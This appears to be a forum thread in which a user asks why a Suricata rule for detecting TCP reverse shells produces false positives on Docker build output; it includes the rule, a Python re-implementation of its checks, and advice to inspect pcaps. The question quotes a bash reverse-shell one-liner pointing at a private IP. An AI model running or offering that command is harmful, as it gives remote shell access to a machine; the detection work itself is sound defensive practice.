TCP reverse shell detection

Hi guys, I'm trying to use Suricata to detect TCP reverse shell actions such as:

/bin/bash -i 0>& /dec/tcp/192.168.111.222/333 0>&1

My rule looks like this:

# offset/depth modify the content keyword that precedes them, so they go after content, not before it
alert tcp any any -> any any (msg:"TCP reverse shell detection."; flow:established; pcre:"/root@.+(#|$)/i"; tcp.hdr; content:"|01 01 08 0a|"; offset:20; depth:4; sid:1; rev:1;)

Sometimes it really takes effect, but at the same time it results in a significant number of false positives. I collected some pcaps and Jenkins turned out to be the culprit.

[root@localhost demo]# docker build -t demo:2.0 .
Sending build context to Docker daemon  17.57MB
Step 1/4 : FROM openjdk:8-jdk-alpine
 ---> a3562aa0b991
Step 2/4 : VOLUME /tmp
 ---> Using cache
 ---> a98cf1fbeb9d
Step 3/4 : ADD ./demojenkins.jar demojenkins.jar
 ---> 12bfc15e5295
Step 4/4 : ENTRYPOINT ['java','-jar','/demojenkins.jar', '&']
 ---> Running in 2908dd94dfa7
Removing intermediate container 2908dd94dfa7
 ---> 3041db93b6df
Successfully built 3041db93b6df
Successfully tagged demo:2.0

Could anyone give me some advice? Appreciate it.
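To see why the rule fires on build output, here is an added example (not from the post or from Suricata) that re-implements the rule's two checks in Python: the pcre over the payload and the `tcp.hdr` content at offset 20 (NOP, NOP, Timestamp option). It runs the checks over a constructed interactive-shell prompt and over the Docker build output from the post, and also tries an assumed tighter regex that requires the prompt to sit at the very end of the payload; the TCP header builder and the sample payloads are constructed for this example.

```python
import re
import struct

# Payload check of the posted rule: pcre:"/root@.+(#|$)/i"
PROMPT_RE = re.compile(rb"root@.+(#|$)", re.IGNORECASE)

# Assumed tighter variant (not from the post): an interactive shell sends the
# prompt as the last thing in the segment, so require "#" or "$" at payload end.
PROMPT_AT_END_RE = re.compile(rb"root@[\w.-]+[^\r\n]*[#$] ?$", re.IGNORECASE)

# tcp.hdr; content:"|01 01 08 0a|"; offset:20; depth:4;
# -> bytes 20..23 of the TCP header are NOP, NOP, Timestamp (kind 8, len 10)
TS_OPTION_PREFIX = b"\x01\x01\x08\x0a"


def build_tcp_header(sport: int, dport: int, options: bytes) -> bytes:
    """Constructed 20-byte TCP header (PSH,ACK) followed by options padded to 4 bytes."""
    opts = options + b"\x00" * (-len(options) % 4)
    data_offset = (20 + len(opts)) // 4
    fixed = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, data_offset << 4, 0x18, 65535, 0, 0)
    return fixed + opts


def tcp_options_match(tcp_header: bytes) -> bool:
    """Mirror of the tcp.hdr offset/depth check in the rule."""
    return tcp_header[20:24] == TS_OPTION_PREFIX


def rule_matches(tcp_header: bytes, payload: bytes, at_end_only: bool = False) -> bool:
    """True when both the header check and the chosen payload regex fire."""
    regex = PROMPT_AT_END_RE if at_end_only else PROMPT_RE
    return tcp_options_match(tcp_header) and regex.search(payload) is not None


# Constructed samples: Linux-style options (NOP NOP TS with 8 bytes of timestamps)
LINUX_HDR = build_tcp_header(4444, 51234, TS_OPTION_PREFIX + b"\x00" * 8)
MSS_ONLY_HDR = build_tcp_header(4444, 51234, b"\x02\x04\x05\xb4")
SHELL_PROMPT = b"root@victim:~# "
DOCKER_OUTPUT = (b"[root@localhost demo]# docker build -t demo:2.0 .\n"
                 b"Sending build context to Docker daemon  17.57MB\n")

if __name__ == "__main__":
    for name, payload in (("shell prompt", SHELL_PROMPT), ("docker output", DOCKER_OUTPUT)):
        print(name, "posted pcre:", rule_matches(LINUX_HDR, payload),
              "prompt-at-end:", rule_matches(LINUX_HDR, payload, at_end_only=True))
```

Both samples satisfy the header check, so only the regex decides; the posted pcre matches the `root@localhost demo]#` inside the build log, while the end-anchored variant matches only the bare prompt.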

Might help to capture the traffic and inspect the pcap to see if the traffic pattern in the rule is present.